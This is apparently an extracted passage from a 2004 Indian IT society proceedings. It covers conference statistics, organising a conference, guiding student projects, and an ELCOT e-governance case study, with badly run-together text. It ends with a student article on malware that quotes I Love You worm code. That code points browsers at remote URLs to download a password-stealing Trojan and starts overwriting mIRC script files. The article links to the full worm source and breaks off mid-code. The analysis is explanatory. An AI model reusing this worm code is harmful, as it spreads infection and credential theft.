As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

